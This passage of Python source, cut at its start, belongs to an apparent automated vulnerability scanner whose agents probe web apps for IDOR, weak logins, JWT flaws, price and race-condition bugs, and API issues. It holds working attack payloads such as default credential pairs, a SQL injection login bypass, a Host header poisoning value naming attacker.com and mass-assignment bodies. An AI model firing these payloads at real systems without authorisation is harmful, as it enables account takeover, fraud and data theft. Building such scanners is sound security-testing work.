                    status = data.get("status", 0) if isinstance(data, dict) else 0
                    body   = str(data.get("body", "") if isinstance(data, dict) else data)

                    alt_id = str(h.context.get("alt_id", h.payload))
                    other_markers = [
                        f'"id":{alt_id}', f'"user_id":{alt_id}',
                        f'"order_id":{alt_id}', f'"account_id":{alt_id}',
                        session.get("other_username", "__UNLIKELY_MARKER__"),
                    ]
                    if status == 200 and len(body) > 40 and any(m in body for m in other_markers):
                        findings.append(self._finding(
                            target         = url,
                            vuln_type      = "idor",
                            severity       = "high",
                            title          = f"IDOR ({h.attack_vector}) — ID {h.payload} accessible",
                            description    = "Changing the object identifier exposes another user's data.",
                            payload        = h.payload,
                            evidence       = body[:500],
                            cvss           = 8.1,
                            confidence     = 0.82,
                            reproduced     = True,
                            chain_potential= ["idor_to_account_takeover", "idor_data_breach"],
                            remediation    = "Enforce server-side ownership checks on every object lookup.",
                        ))
                        break   # one finding per hypothesis is enough
            except Exception as exc:
                logger.debug("[%s] IDOR test error: %s", self.name, exc)
            await asyncio.sleep(0.05)

        return findings


# ─────────────────────────────────────────────────────────────────────────────

class AuthAgent(SwarmAgent):
    """Authentication & session management specialist."""

    RELEVANT_NODE_TYPES    = ["auth_flow", "url"]
    RELEVANT_LABEL_KEYWORDS = ["login", "auth", "token", "jwt", "session", "password", "register"]

    _WEAK_CREDS = [
        ("admin", "admin"), ("admin", "password"), ("admin", "123456"),
        ("root",  "root"),  ("test",  "test"),     ("guest", "guest"),
        ("admin", "admin123"), ("user", "user"),
    ]

    _JWT_ATTACKS = ["none_alg", "weak_secret_brute", "kid_path_traversal", "jwks_spoof"]

    def __init__(self, **kwargs):
        super().__init__(AgentType.AUTH, **kwargs)

    async def generate_hypotheses(self, target, graph_nodes, context) -> List[Hypothesis]:
        hypotheses: List[Hypothesis] = []
        auth_eps   = context.get("auth_endpoints", [])
        jwt_tokens = context.get("jwt_tokens", [])

        for ep in auth_eps[:10]:
            for user, pwd in self._WEAK_CREDS:
                hypotheses.append(Hypothesis(
                    hypothesis_id = uuid.uuid4().hex[:8],
                    agent_type    = self.agent_type,
                    target_node   = ep,
                    attack_vector = "auth_weak_credentials",
                    confidence    = self.memory.rate("auth_weak_credentials", 0.28),
                    payload       = json.dumps({"username": user, "password": pwd}),
                    context       = {"endpoint": ep, "username": user, "password": pwd},
                    reasoning     = f"Testing default credential pair {user}/{pwd}",
                    priority      = 0.50,
                ))
            # Auth bypass via SQL injection
            hypotheses.append(Hypothesis(
                hypothesis_id = uuid.uuid4().hex[:8],
                agent_type    = self.agent_type,
                target_node   = ep,
                attack_vector = "auth_sqli_bypass",
                confidence    = self.memory.rate("auth_sqli_bypass", 0.38),
                payload       = json.dumps({"username": "admin'--", "password": "x"}),
                context       = {"endpoint": ep, "username": "admin'--", "password": "x"},
                reasoning     = "SQL injection in login form may bypass authentication",
                priority      = 0.65,
            ))
            # Password reset poisoning
            hypotheses.append(Hypothesis(
                hypothesis_id = uuid.uuid4().hex[:8],
                agent_type    = self.agent_type,
                target_node   = ep,
                attack_vector = "password_reset_poison",
                confidence    = self.memory.rate("password_reset_poison", 0.35),
                payload       = "Host: attacker.com",
                context       = {"endpoint": ep},
                reasoning     = "Host header poisoning in password reset flow",
                priority      = 0.60,
            ))

        for token in jwt_tokens[:5]:
            for attack in self._JWT_ATTACKS:
                hypotheses.append(Hypothesis(
                    hypothesis_id = uuid.uuid4().hex[:8],
                    agent_type    = self.agent_type,
                    target_node   = target,
                    attack_vector = f"jwt_{attack}",
                    confidence    = self.memory.rate(f"jwt_{attack}",
                                       0.55 if attack == "none_alg" else 0.32),
                    payload       = token,
                    context       = {"token": token, "attack": attack},
                    reasoning     = f"JWT {attack} attack",
                    priority      = 0.70 if attack == "none_alg" else 0.45,
                ))

        hypotheses.sort(key=lambda h: h.priority, reverse=True)
        return hypotheses[:35]

    async def execute_tests(self, target, hypotheses, context) -> List[AgentFinding]:
        findings: List[AgentFinding] = []

        for h in hypotheses:
            if self._stop_event.is_set():
                break
            try:
                if h.attack_vector.startswith("jwt_"):
                    result = await self._tool("jwt_tool",
                        token=h.payload,
                        attack=h.context.get("attack"),
                    )
                    data = result.get("data") or {}
                    if (result.get("success") and
                            isinstance(data, dict) and data.get("vulnerable")):
                        findings.append(self._finding(
                            target         = h.target_node,
                            vuln_type      = h.attack_vector,
                            severity       = "critical",
                            title          = f"JWT {h.context['attack'].replace('_',' ').title()} Vulnerability",
                            description    = f"JWT token is vulnerable to {h.context['attack']}.",
                            payload        = h.payload[:200],
                            evidence       = str(data)[:400],
                            cvss           = 9.0,
                            confidence     = 0.88,
                            reproduced     = True,
                            chain_potential= ["jwt_to_account_takeover"],
                            remediation    = "Use RS256/ES256; explicitly reject 'none' algorithm.",
                        ))
                elif h.attack_vector == "auth_weak_credentials":
                    creds  = h.context
                    result = await self._tool("httpx",
                        url=h.target_node,
                        method="POST",
                        data={"username": creds["username"], "password": creds["password"]},
                    )
                    data   = result.get("data") or {}
                    status = data.get("status", 0) if isinstance(data, dict) else 0
                    body   = str(data.get("body", "") if isinstance(data, dict) else data).lower()

                    if status in [200, 302] and any(
                        k in body for k in ["token", "session", "dashboard", "welcome", "logged in"]
                    ):
                        findings.append(self._finding(
                            target         = h.target_node,
                            vuln_type      = "weak_credentials",
                            severity       = "critical",
                            title          = f"Weak Credentials: {creds['username']}/{creds['password']}",
                            description    = "Application accepts default/weak credentials.",
                            payload        = h.payload,
                            evidence       = body[:300],
                            cvss           = 9.8,
                            confidence     = 0.95,
                            reproduced     = True,
                            chain_potential= ["weak_creds_to_full_compromise"],
                            remediation    = "Enforce strong password policy; disable default accounts.",
                        ))
            except Exception as exc:
                logger.debug("[%s] Auth test error: %s", self.name, exc)
            await asyncio.sleep(0.06)

        return findings


# ─────────────────────────────────────────────────────────────────────────────

class BusinessLogicAgent(SwarmAgent):
    """Business logic flaw specialist — pricing, coupons, race conditions, workflow skips."""

    RELEVANT_NODE_TYPES    = ["url", "api_endpoint"]
    RELEVANT_LABEL_KEYWORDS = ["checkout", "cart", "order", "payment", "coupon",
                                "discount", "transfer", "withdraw", "vote", "redeem"]

    def __init__(self, **kwargs):
        super().__init__(AgentType.BUSINESS_LOGIC, **kwargs)

    async def generate_hypotheses(self, target, graph_nodes, context) -> List[Hypothesis]:
        hypotheses: List[Hypothesis] = []
        endpoints  = context.get("endpoints", [target])

        biz_eps = [ep for ep in endpoints if any(
            k in ep.lower() for k in
            ["cart", "checkout", "order", "payment", "coupon", "discount",
             "transfer", "price", "quantity", "redeem", "vote"]
        )]

        for ep in biz_eps[:15]:
            hypotheses += [
                Hypothesis(
                    hypothesis_id = uuid.uuid4().hex[:8],
                    agent_type    = self.agent_type,
                    target_node   = ep,
                    attack_vector = "price_manipulation_negative",
                    confidence    = self.memory.rate("price_manipulation_negative", 0.48),
                    payload       = "-1",
                    context       = {"endpoint": ep, "field": "price", "value": -1},
                    reasoning     = "Negative price may bypass payment or generate credit",
                    priority      = 0.75,
                ),
                Hypothesis(
                    hypothesis_id = uuid.uuid4().hex[:8],
                    agent_type    = self.agent_type,
                    target_node   = ep,
                    attack_vector = "quantity_integer_overflow",
                    confidence    = self.memory.rate("quantity_integer_overflow", 0.40),
                    payload       = "99999999",
                    context       = {"endpoint": ep, "field": "quantity", "value": 99999999},
                    reasoning     = "Integer overflow in quantity may cause pricing miscalculation",
                    priority      = 0.60,
                ),
                Hypothesis(
                    hypothesis_id = uuid.uuid4().hex[:8],
                    agent_type    = self.agent_type,
                    target_node   = ep,
                    attack_vector = "coupon_reuse",
                    confidence    = self.memory.rate("coupon_reuse", 0.52),
                    payload       = "SAVE50",
                    context       = {"endpoint": ep, "codes": ["SAVE50", "FREE", "DISCOUNT100"]},
                    reasoning     = "Coupon code may be reusable, stackable, or accept expired codes",
                    priority      = 0.65,
                ),
                Hypothesis(
                    hypothesis_id = uuid.uuid4().hex[:8],
                    agent_type    = self.agent_type,
                    target_node   = ep,
                    attack_vector = "race_condition_double_spend",
                    confidence    = self.memory.rate("race_condition_double_spend", 0.38),
                    payload       = "concurrent_x10",
                    context       = {"endpoint": ep, "concurrency": 10},
                    reasoning     = "Race condition: simultaneous checkout requests may succeed multiple times",
                    priority      = 0.70,
                ),
            ]

        hypotheses.sort(key=lambda h: h.priority, reverse=True)
        return hypotheses[:30]

    async def execute_tests(self, target, hypotheses, context) -> List[AgentFinding]:
        findings: List[AgentFinding] = []

        for h in hypotheses:
            if self._stop_event.is_set():
                break
            try:
                if h.attack_vector == "race_condition_double_spend":
                    concurrency = h.context.get("concurrency", 10)
                    tasks = [
                        self._tool("httpx", url=h.target_node, method="POST")
                        for _ in range(concurrency)
                    ]
                    results = await asyncio.gather(*tasks, return_exceptions=True)
                    successes = sum(
                        1 for r in results
                        if isinstance(r, dict) and
                        (r.get("data") or {}).get("status", 0) in [200, 201]
                    )
                    if successes > 1:
                        findings.append(self._finding(
                            target         = h.target_node,
                            vuln_type      = "race_condition",
                            severity       = "high",
                            title          = f"Race Condition — {successes}/{concurrency} concurrent requests succeeded",
                            description    = "Multiple simultaneous requests all returned success, indicating missing atomicity.",
                            payload        = h.payload,
                            evidence       = f"{successes}/{concurrency} concurrent requests returned 2xx",
                            cvss           = 7.5,
                            confidence     = 0.78,
                            reproduced     = True,
                            chain_potential= ["race_condition_to_double_spend"],
                            remediation    = "Implement database-level locking or idempotency keys.",
                        ))

                elif h.attack_vector == "price_manipulation_negative":
                    result = await self._tool("httpx",
                        url=h.target_node,
                        method="POST",
                        data={h.context.get("field", "price"): h.context.get("value", -1)},
                    )
                    data   = result.get("data") or {}
                    status = data.get("status", 0) if isinstance(data, dict) else 0
                    body   = str(data.get("body", "") if isinstance(data, dict) else data).lower()

                    if status in [200, 201] and any(
                        k in body for k in ["order", "success", "confirmed", "placed"]
                    ):
                        findings.append(self._finding(
                            target         = h.target_node,
                            vuln_type      = "price_manipulation",
                            severity       = "critical",
                            title          = "Business Logic: Negative Price Accepted",
                            description    = "Application accepted a negative price value — may generate fraudulent credit.",
                            payload        = h.payload,
                            evidence       = body[:400],
                            cvss           = 9.1,
                            confidence     = 0.82,
                            reproduced     = True,
                            chain_potential= ["price_manipulation_to_free_goods"],
                            remediation    = "Server-side validate all monetary values are positive; reject negatives.",
                        ))

            except Exception as exc:
                logger.debug("[%s] BizLogic test error: %s", self.name, exc)
            await asyncio.sleep(0.08)

        return findings


# ─────────────────────────────────────────────────────────────────────────────

class MobileSecurityAgent(SwarmAgent):
    """Mobile security specialist — delegates to MobileSecurityEngine."""

    RELEVANT_NODE_TYPES    = []
    RELEVANT_LABEL_KEYWORDS = ["mobile", "apk", "ipa", "android", "ios"]

    _MOBILE_CHECKS = [
        ("ssl_pinning_bypass",      "SSL pinning may be bypassable via Frida hook",         0.65),
        ("root_detection_bypass",   "Root detection may be circumventable",                  0.70),
        ("hardcoded_secrets",       "APK DEX may contain hardcoded credentials/API keys",    0.58),
        ("exported_components",     "Exported Android components lack permission checks",    0.62),
        ("insecure_storage",        "Sensitive data stored in plaintext SharedPrefs/SQLite", 0.52),
        ("deeplink_injection",      "Deep link handler processes untrusted input",           0.47),
        ("webview_js_enabled",      "WebView with JavaScript enabled loads remote content",  0.55),
        ("insecure_network",        "App communicates over HTTP or ignores cert errors",     0.60),
    ]

    def __init__(self, **kwargs):
        super().__init__(AgentType.MOBILE, **kwargs)
        self._mobile_engine = None
        try:
            from mobile_security_engine import MobileSecurityEngine
            self._mobile_engine = MobileSecurityEngine()
        except Exception:
            pass

    async def generate_hypotheses(self, target, graph_nodes, context) -> List[Hypothesis]:
        apk_id = context.get("apk_id")
        if not apk_id:
            return []
        return [
            Hypothesis(
                hypothesis_id = uuid.uuid4().hex[:8],
                agent_type    = self.agent_type,
                target_node   = apk_id,
                attack_vector = f"mobile_{check}",
                confidence    = self.memory.rate(f"mobile_{check}", default_conf),
                payload       = check,
                context       = {"apk_id": apk_id, "check": check},
                reasoning     = reasoning,
                priority      = default_conf,
            )
            for check, reasoning, default_conf in self._MOBILE_CHECKS
        ]

    async def execute_tests(self, target, hypotheses, context) -> List[AgentFinding]:
        findings: List[AgentFinding] = []
        if not self._mobile_engine:
            return findings
        apk_id = context.get("apk_id")
        if not apk_id:
            return findings
        try:
            loop    = asyncio.get_event_loop()
            results = await loop.run_in_executor(
                None, lambda: self._mobile_engine.analyze(apk_id)
            )
            for r in (results or []):
                findings.append(self._finding(
                    target    = apk_id,
                    vuln_type = r.get("type", "mobile_vuln"),
                    severity  = r.get("severity", "medium"),
                    title     = r.get("title", "Mobile Security Issue"),
                    description = r.get("description", ""),
                    payload   = r.get("payload", ""),
                    evidence  = r.get("evidence", ""),
                    cvss      = r.get("cvss", 5.0),
                    confidence= r.get("confidence", 0.70),
                    reproduced= False,
                    chain_potential = r.get("chain_potential", []),
                    remediation = r.get("remediation", ""),
                ))
        except Exception as exc:
            logger.debug("[%s] Mobile test error: %s", self.name, exc)
        return findings


# ─────────────────────────────────────────────────────────────────────────────

class APISecurityAgent(SwarmAgent):
    """API security specialist — GraphQL, BOLA, mass assignment, rate limits."""

    RELEVANT_NODE_TYPES    = ["api_endpoint", "url"]
    RELEVANT_LABEL_KEYWORDS = ["api", "graphql", "rest", "v1", "v2", "v3", "endpoint"]

    _ATTACK_PAYLOADS: Dict[str, str] = {
        "graphql_introspection": '{"query":"{__schema{queryType{name}}}"}',
        "bola":                  '{"user_id": 2}',
        "mass_assignment":       '{"role":"admin","is_admin":true,"admin":true}',
        "rate_limit_bypass":     "X-Forwarded-For: 127.0.0.1",
        "version_bypass":        "/api/v0/",
        "method_override":       "X-HTTP-Method-Override: DELETE",
        "api_key_disclosure":    "/api/debug/config",
        "excessive_data":        "?fields=*&expand=all&include=password,token",
    }

    def __init__(self, **kwargs):
        super().__init__(AgentType.API, **kwargs)

    async def generate_hypotheses(self, target, graph_nodes, context) -> List[Hypothesis]:
        hypotheses: List[Hypothesis] = []
        api_eps = context.get("api_endpoints", context.get("endpoints", [target]))

        for ep in api_eps[:20]:
            for attack, payload in self._ATTACK_PAYLOADS.items():
                if attack == "graphql_introspection" and "graphql" not in ep.lower():
                    continue
                hypotheses.append(Hypothesis(
                    hypothesis_id = uuid.uuid4().hex[:8],
                    agent_type    = self.agent_type,
                    target_node   = ep,
                    attack_vector = attack,
                    confidence    = self.memory.rate(attack, 0.38),
                    payload       = payload,
                    context       = {"endpoint": ep, "attack": attack},
                    reasoning     = f"API endpoint may be vulnerable to {attack}",
                    priority      = self.memory.rate(attack, 0.38),
                ))

        hypotheses.sort(key=lambda h: h.priority, reverse=True)
        return hypotheses[:40]

    async def execute_tests(self, target, hypotheses, context) -> List[AgentFinding]:
        findings: List[AgentFinding] = []

        for h in hypotheses:
            if self._stop_event.is_set():
                break
            try:
                result = await self._tool("httpx", url=h.target_node)
                data   = result.get("data") or {}
                status = data.get("status", 0) if isinstance(data, dict) else 0
                body   = str(data.get("body", "") if isinstance(data, dict) else data)

                if h.attack_vector == "graphql_introspection" and "__schema" in body:
                    findings.append(self._finding(
                        target         = h.target_node,
                        vuln_type      = "graphql_introspection",
                        severity       = "medium",
                        title          = "GraphQL Introspection Enabled",
                        description    = "Full API schema exposed via introspection query.",
                        payload        = h.payload,
                        evidence       = body[:400],
                        cvss           = 5.3,
                        confidence     = 0.95,
                        reproduced     = True,
                        chain_potential= ["graphql_to_bola", "graphql_schema_harvest"],
                        remediation    = "Disable introspection in production; use field-level authorization.",
                    ))
                elif h.attack_vector == "bola" and status == 200:
                    if any(k in body for k in ['"user_id"', '"email"', '"role"', '"password"']):
                        findings.append(self._finding(
                            target         = h.target_node,
                            vuln_type      = "bola",
                            severity       = "high",
                            title          = "BOLA — Broken Object Level Authorization",
                            description    = "API returns another object's data without ownership check.",
                            payload        = h.payload,
                            evidence       = body[:500],
                            cvss           = 8.1,
                            confidence     = 0.80,
                            reproduced     = True,
                            chain_potential= ["bola_to_data_breach"],
                            remediation    = "Add per-object ownership validation in every API handler.",
                        ))
                elif h.attack_vector == "mass_assignment" and status in [200, 201]:
                    if any(k in body for k in ['"admin":true', '"role":"admin"', '"is_admin":true']):
                        findings.append(self._finding(
                            target         = h.target_node,
                            vuln_type      = "mass_assignment",
                            severity       = "high",
                            title          = "Mass Assignment — Privilege Field Writeable",
                            description    = "API allows assigning privileged fields (role/admin) via request body.",
                            payload        = h.payload,
                            evidence       = body[:400],
                            cvss           = 8.8,
                            confidence     = 0.85,
                            reproduced     = True,
                            chain_potential= ["mass_assignment_to_privilege_escalation"],
                            remediation    = "Use explicit allowlists for API request body fields.",
                        ))
            except Exception as exc:
                logger.debug("[%s] API test error: %s", self.name, exc)
            await asyncio.sleep(0.05)

        return findings


# ═════════════════════════════════════════════════════════════════════════════
# FACTORY
# ═════════════════════════════════════════════════════════════════════════════

_AGENT_CLASSES: Dict[AgentType, type] = {
    AgentType.XSS:            XSSAgent,
    AgentType.SQLI:           SQLiAgent,
    AgentType.SSRF:           SSRFAgent,
    AgentType.IDOR:           IDORAgent,
    AgentType.AUTH:           AuthAgent,
    AgentType.BUSINESS_LOGIC: BusinessLogicAgent,
    AgentType.MOBILE:         MobileSecurityAgent,
    AgentType.API:            APISecurityAgent,
}


def create_agent(
    agent_type:     AgentType,
    tool_registry:  Optional[Any] = None,
    attack_graph:   Optional[Any] = None,
    knowledge_base: Optional[Any] = None,
    shared_state:   Optional[Dict] = None,
) -> SwarmAgent:
    """Factory: instantiate the correct SwarmAgent subclass by AgentType."""
    cls = _AGENT_CLASSES.get(agent_type, SwarmAgent)
    return cls(
        tool_registry  = tool_registry,
        attack_graph   = attack_graph,
        knowledge_base = knowledge_base,
        shared_state   = shared_state,
    )


def create_full_swarm(
    tool_registry:  Optional[Any] = None,
    attack_graph:   Optional[Any] = None,
    knowledge_base: Optional[Any] = None,
    shared_state:   Optional[Dict] = None,
    agent_types:    Optional[List[AgentType]] = None,
) -> Dict[AgentType, SwarmAgent]:
    """
    Create one agent of every requested type (default: all 8).
    Returns a dict mapping AgentType → SwarmAgent instance.
    """
    types = agent_types or list(AgentType)
    return {
        at: create_agent(at, tool_registry, attack_graph, knowledge_base, shared_state)
        for at in types
    }
